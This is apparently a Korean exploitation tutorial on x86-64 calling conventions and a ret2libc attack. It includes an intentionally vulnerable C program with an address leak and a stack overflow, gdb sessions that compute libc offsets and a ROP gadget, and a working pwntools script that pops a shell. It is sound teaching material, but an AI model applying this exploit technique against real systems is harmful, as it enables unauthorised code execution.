/* Caller side of a four-argument call. On x86-64 (System V ABI) these
   integer arguments travel in registers rather than on the stack -- the
   matching assembly below loads rdi=a, rsi=b, rdx=c, rcx=d -- and the
   int result comes back in eax. */
int a,b,c,d;
int ret;
ret = function(a,b,c,d);
mov rcx,d        ; 4th integer argument
mov rdx,c        ; 3rd integer argument
mov rsi,b        ; 2nd integer argument
mov rdi,a        ; 1st integer argument
call function
mov ret,eax      ; int return value is delivered in eax
//gcc -o test test.c   (no -O flag, so the disassembly shown below is unoptimized code)
#include <stdlib.h>
#include <stdio.h>

/*
 * Calling-convention demo, not a vulnerable program: the only input is constant.
 * The four int arguments arrive in edi, esi, edx, ecx, are spilled to the stack,
 * and are then shuffled for the printf call (see the vuln disassembly and the
 * register dump at the printf breakpoint: format string in edi/rdi, a..d in
 * esi, edx, ecx, r8d).
 */
void vuln(int a,int b,int c,int d){
    /* Constant format string, so no format-string issue here.
       No trailing newline: output may stay buffered until the program exits. */
    printf("%d, %d, %d, %d",a,b,c,d);
}

/* NOTE(review): ISO C requires int main(void); left as void main() so that the
   main() disassembly on this page (no return-value setup) still matches. */
void main(){
    vuln(1,2,3,4);
}
lazenca0x0@ubuntu:~/Exploit/RTL$ gdb -q ./test Reading symbols from ./test...(no debugging symbols found)...done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x000000000040055d <+0>: push rbp 0x000000000040055e <+1>: mov rbp,rsp 0x0000000000400561 <+4>: mov ecx,0x4 0x0000000000400566 <+9>: mov edx,0x3 0x000000000040056b <+14>: mov esi,0x2 0x0000000000400570 <+19>: mov edi,0x1 0x0000000000400575 <+24>: call 0x400526 <vuln> 0x000000000040057a <+29>: nop 0x000000000040057b <+30>: pop rbp 0x000000000040057c <+31>: ret End of assembler dump. gdb-peda$ b *0x0000000000400575 Breakpoint 1 at 0x400575 gdb-peda$ |
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/RTL/test Breakpoint 1, 0x0000000000400575 in main () gdb-peda$ i r rax 0x40055d 0x40055d rbx 0x0 0x0 rcx 0x4 0x4 rdx 0x3 0x3 rsi 0x2 0x2 rdi 0x1 0x1 rbp 0x7fffffffe460 0x7fffffffe460 rsp 0x7fffffffe460 0x7fffffffe460 r8 0x4005f0 0x4005f0 r9 0x7ffff7de7ab0 0x7ffff7de7ab0 r10 0x846 0x846 r11 0x7ffff7a2d740 0x7ffff7a2d740 r12 0x400430 0x400430 r13 0x7fffffffe540 0x7fffffffe540 r14 0x0 0x0 r15 0x0 0x0 rip 0x400575 0x400575 <main+24> eflags 0x246 [ PF ZF IF ] cs 0x33 0x33 ss 0x2b 0x2b ds 0x0 0x0 es 0x0 0x0 fs 0x0 0x0 gs 0x0 0x0 gdb-peda$ |
그리고 vuln() 함수는 printf() 함수에 인자를 전달하기 위해 인자를 재배치합니다.
printf() 함수의 첫번째 인자는 "%d, %d, %d, %d" 입니다.
gdb-peda$ disassemble vuln Dump of assembler code for function vuln: 0x0000000000400526 <+0>: push rbp 0x0000000000400527 <+1>: mov rbp,rsp 0x000000000040052a <+4>: sub rsp,0x10 0x000000000040052e <+8>: mov DWORD PTR [rbp-0x4],edi 0x0000000000400531 <+11>: mov DWORD PTR [rbp-0x8],esi 0x0000000000400534 <+14>: mov DWORD PTR [rbp-0xc],edx 0x0000000000400537 <+17>: mov DWORD PTR [rbp-0x10],ecx 0x000000000040053a <+20>: mov esi,DWORD PTR [rbp-0x10] 0x000000000040053d <+23>: mov ecx,DWORD PTR [rbp-0xc] 0x0000000000400540 <+26>: mov edx,DWORD PTR [rbp-0x8] 0x0000000000400543 <+29>: mov eax,DWORD PTR [rbp-0x4] 0x0000000000400546 <+32>: mov r8d,esi 0x0000000000400549 <+35>: mov esi,eax 0x000000000040054b <+37>: mov edi,0x400604 0x0000000000400550 <+42>: mov eax,0x0 0x0000000000400555 <+47>: call 0x400400 <printf@plt> 0x000000000040055a <+52>: nop 0x000000000040055b <+53>: leave 0x000000000040055c <+54>: ret End of assembler dump. gdb-peda$ b *0x0000000000400555 Breakpoint 2 at 0x400555 gdb-peda$ |
gdb-peda$ c Continuing. Breakpoint 2, 0x0000000000400555 in vuln () gdb-peda$ i r rax 0x0 0x0 rbx 0x0 0x0 rcx 0x3 0x3 rdx 0x2 0x2 rsi 0x1 0x1 rdi 0x400604 0x400604 rbp 0x7fffffffe450 0x7fffffffe450 rsp 0x7fffffffe440 0x7fffffffe440 r8 0x4 0x4 r9 0x7ffff7de7ab0 0x7ffff7de7ab0 r10 0x846 0x846 r11 0x7ffff7a2d740 0x7ffff7a2d740 r12 0x400430 0x400430 r13 0x7fffffffe540 0x7fffffffe540 r14 0x0 0x0 r15 0x0 0x0 rip 0x400555 0x400555 <vuln+47> eflags 0x202 [ IF ] cs 0x33 0x33 ss 0x2b 0x2b ds 0x0 0x0 es 0x0 0x0 fs 0x0 0x0 gs 0x0 0x0 gdb-peda$ x/s 0x400604 0x400604: "%d, %d, %d, %d" gdb-peda$ |
#define _GNU_SOURCE   /* RTLD_NEXT is a GNU extension of <dlfcn.h> */
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>

/*
 * Deliberately vulnerable target for the ret2libc walkthrough.
 *
 * Two weaknesses are combined on purpose:
 *  1. Information leak: the resolved address of printf (a libc address) is
 *     printed, which lets the libc base be recovered despite ASLR.
 *  2. Stack buffer overflow: up to 100 bytes are read into a 50-byte buffer,
 *     far enough to overwrite the saved return address (the gdb session
 *     measures the distance from buf to the saved rip as 72 bytes).
 * The binary is built with -fno-stack-protector, so no canary sits between
 * buf and the saved frame.
 */
void vuln(){
    char buf[50] = "";
    /* RTLD_NEXT: look the symbol up in the objects loaded after this one,
       which yields libc's printf rather than any local definition.
       NOTE(review): printing a function pointer with %p is not strictly
       portable (%p expects void *), but works on this target. */
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    /* BUG (intentional): size 100 exceeds sizeof buf (50) and the return value
       is ignored. Bounding the read to sizeof buf removes the overflow; a
       stack protector or PIE would further raise the cost of abusing it. */
    read(0, buf, 100);
}

/* NOTE(review): ISO C requires int main(void); kept as written so the
   disassembly on this page matches. */
void main(){
    vuln();
}
lazenca0x0@ubuntu:~/Exploit/RTL$ gcc -fno-stack-protector -o ret2libc ret2libc.c -ldl |
lazenca0x0@ubuntu:~/Exploit/RTL$ gdb -q ./ret2libc Reading symbols from ./ret2libc...(no debugging symbols found)...done. gdb-peda$ disassemble vuln Dump of assembler code for function vuln: 0x0000000000400676 <+0>: push rbp 0x0000000000400677 <+1>: mov rbp,rsp 0x000000000040067a <+4>: sub rsp,0x40 0x000000000040067e <+8>: mov QWORD PTR [rbp-0x40],0x0 0x0000000000400686 <+16>: lea rdx,[rbp-0x38] 0x000000000040068a <+20>: mov eax,0x0 0x000000000040068f <+25>: mov ecx,0x5 0x0000000000400694 <+30>: mov rdi,rdx 0x0000000000400697 <+33>: rep stos QWORD PTR es:[rdi],rax 0x000000000040069a <+36>: mov rdx,rdi 0x000000000040069d <+39>: mov WORD PTR [rdx],ax 0x00000000004006a0 <+42>: add rdx,0x2 0x00000000004006a4 <+46>: mov esi,0x400784 0x00000000004006a9 <+51>: mov rdi,0xffffffffffffffff 0x00000000004006b0 <+58>: call 0x400560 <dlsym@plt> 0x00000000004006b5 <+63>: mov QWORD PTR [rbp-0x8],rax 0x00000000004006b9 <+67>: mov rax,QWORD PTR [rbp-0x8] 0x00000000004006bd <+71>: mov rsi,rax 0x00000000004006c0 <+74>: mov edi,0x40078b 0x00000000004006c5 <+79>: mov eax,0x0 0x00000000004006ca <+84>: call 0x400530 <printf@plt> 0x00000000004006cf <+89>: lea rax,[rbp-0x40] 0x00000000004006d3 <+93>: mov edx,0x64 0x00000000004006d8 <+98>: mov rsi,rax 0x00000000004006db <+101>: mov edi,0x0 0x00000000004006e0 <+106>: call 0x400540 <read@plt> 0x00000000004006e5 <+111>: nop 0x00000000004006e6 <+112>: leave 0x00000000004006e7 <+113>: ret End of assembler dump. gdb-peda$ b *0x400676 Breakpoint 1 at 0x400676 gdb-peda$ b *0x4006e0 Breakpoint 2 at 0x4006e0 gdb-peda$ b *0x4006e7 Breakpoint 3 at 0x4006e7 gdb-peda$ |
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/RTL/ret2libc Breakpoint 1, 0x0000000000400676 in vuln () gdb-peda$ i r rsp rsp 0x7fffffffe498 0x7fffffffe498 gdb-peda$ x/gx 0x7fffffffe498 0x7fffffffe498: 0x00000000004006f6 gdb-peda$ disassemble main Dump of assembler code for function main: 0x00000000004006e8 <+0>: push rbp 0x00000000004006e9 <+1>: mov rbp,rsp 0x00000000004006ec <+4>: mov eax,0x0 0x00000000004006f1 <+9>: call 0x400676 <vuln> 0x00000000004006f6 <+14>: nop 0x00000000004006f7 <+15>: pop rbp 0x00000000004006f8 <+16>: ret End of assembler dump. gdb-peda$ |
gdb-peda$ c Continuing. Printf() address : 0x7ffff785e800 Breakpoint 2, 0x00000000004006e0 in vuln () gdb-peda$ i r rsi rsi 0x7fffffffe450 0x7fffffffe450 gdb-peda$ p/d 0x7fffffffe498 - 0x7fffffffe450 $1 = 72 gdb-peda$ c Continuing. AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJ |
0x7fffffffe498 영역에 0x4a4a4a4a4a4a4a4a(JJJJJJJJ)가 저장되었습니다.
Breakpoint 3, 0x00000000004006e7 in vuln () gdb-peda$ x/gx 0x7fffffffe498 0x7fffffffe498: 0x4a4a4a4a4a4a4a4a gdb-peda$ x/s 0x7fffffffe498 0x7fffffffe498: "JJJJJJJJ\n\a@" gdb-peda$ |
gdb-peda$ print system $2 = {<text variable, no debug info>} 0x7ffff784e390 <__libc_system> gdb-peda$ info proc map process 9812 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x401000 0x1000 0x0 /home/lazenca0x0/Exploit/RTL/ret2libc 0x600000 0x601000 0x1000 0x0 /home/lazenca0x0/Exploit/RTL/ret2libc 0x601000 0x602000 0x1000 0x1000 /home/lazenca0x0/Exploit/RTL/ret2libc 0x602000 0x623000 0x21000 0x0 [heap] 0x7ffff7809000 0x7ffff79c9000 0x1c0000 0x0 /lib/x86_64-linux-gnu/libc-2.23.so 0x7ffff79c9000 0x7ffff7bc9000 0x200000 0x1c0000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7ffff7bc9000 0x7ffff7bcd000 0x4000 0x1c0000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7ffff7bcd000 0x7ffff7bcf000 0x2000 0x1c4000 /lib/x86_64-linux-gnu/libc-2.23.so 0x7ffff7bcf000 0x7ffff7bd3000 0x4000 0x0 0x7ffff7bd3000 0x7ffff7bd6000 0x3000 0x0 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7ffff7bd6000 0x7ffff7dd5000 0x1ff000 0x3000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7ffff7dd5000 0x7ffff7dd6000 0x1000 0x2000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7ffff7dd6000 0x7ffff7dd7000 0x1000 0x3000 /lib/x86_64-linux-gnu/libdl-2.23.so 0x7ffff7dd7000 0x7ffff7dfd000 0x26000 0x0 /lib/x86_64-linux-gnu/ld-2.23.so 0x7ffff7fdc000 0x7ffff7fe0000 0x4000 0x0 0x7ffff7ff8000 0x7ffff7ffa000 0x2000 0x0 [vvar] 0x7ffff7ffa000 0x7ffff7ffc000 0x2000 0x0 [vdso] 0x7ffff7ffc000 0x7ffff7ffd000 0x1000 0x25000 /lib/x86_64-linux-gnu/ld-2.23.so 0x7ffff7ffd000 0x7ffff7ffe000 0x1000 0x26000 /lib/x86_64-linux-gnu/ld-2.23.so 0x7ffff7ffe000 0x7ffff7fff000 0x1000 0x0 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] gdb-peda$ p/x 0x7ffff785e800 - 0x7ffff7809000 $2 = 0x55800 gdb-peda$ p/x 0x7ffff784e390 - 0x7ffff7809000 $3 = 0x45390 gdb-peda$ |
gdb-peda$ find "/bin/sh" Searching for '/bin/sh' in: None ranges Found 1 results, display max 1 items: libc : 0x7ffff7995d57 --> 0x68732f6e69622f ('/bin/sh') gdb-peda$ p/x 0x7ffff7995d57 - 0x7ffff7809000 $4 = 0x18cd57 gdb-peda$ |
gdb-peda$ ropsearch "pop rdi; ret" Searching for ROP gadget: 'pop rdi; ret' in: binary ranges 0x00400763 : (b'5fc3') pop rdi; ret gdb-peda$ |
# Python 2 pwntools script (print statement) that drives the ret2libc target above.
from pwn import *

p = process('./ret2libc')

# 1. Information leak: consume the libc address the target prints.
#    NOTE(review): "stackAddr" is a misnomer -- this is printf's libc address, not a stack address.
p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)

# 2. Rebase using the offsets measured in gdb against /lib/x86_64-linux-gnu/libc-2.23.so
#    (printf 0x55800, system 0x45390, "/bin/sh" 0x18cd57). They are only valid for that exact
#    libc build; a different libc breaks the script.
libcBase = stackAddr - 0x55800
sysAddr = libcBase + 0x45390
binsh = libcBase + 0x18cd57
# Gadget inside the non-PIE binary, hence a fixed address (found with ropsearch above).
poprdi = 0x400763

print hex(libcBase)
print hex(sysAddr)
print hex(binsh)
print hex(poprdi)

# 3. Payload layout: gdb measured 72 bytes from buf to the saved return address,
#    so 80 - len(p64(...)) = 72 bytes of padding, then the chain that replaces the saved rip.
#    Everything from here on depends on the leak in step 1; without it ASLR leaves libcBase unknown.
exploit = "A" * (80 - len(p64(sysAddr)))
exploit += p64(poprdi)
exploit += p64(binsh)
exploit += p64(sysAddr)
p.send(exploit)
p.interactive()
lazenca0x0@ubuntu:~/Exploit/RTL$ python Exploit.py [+] Starting local process './ret2libc': pid 10291 0x7f61413b6000 0x7f61413fb390 0x7f6141542d57 0x400763 [*] Switching to interactive mode $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |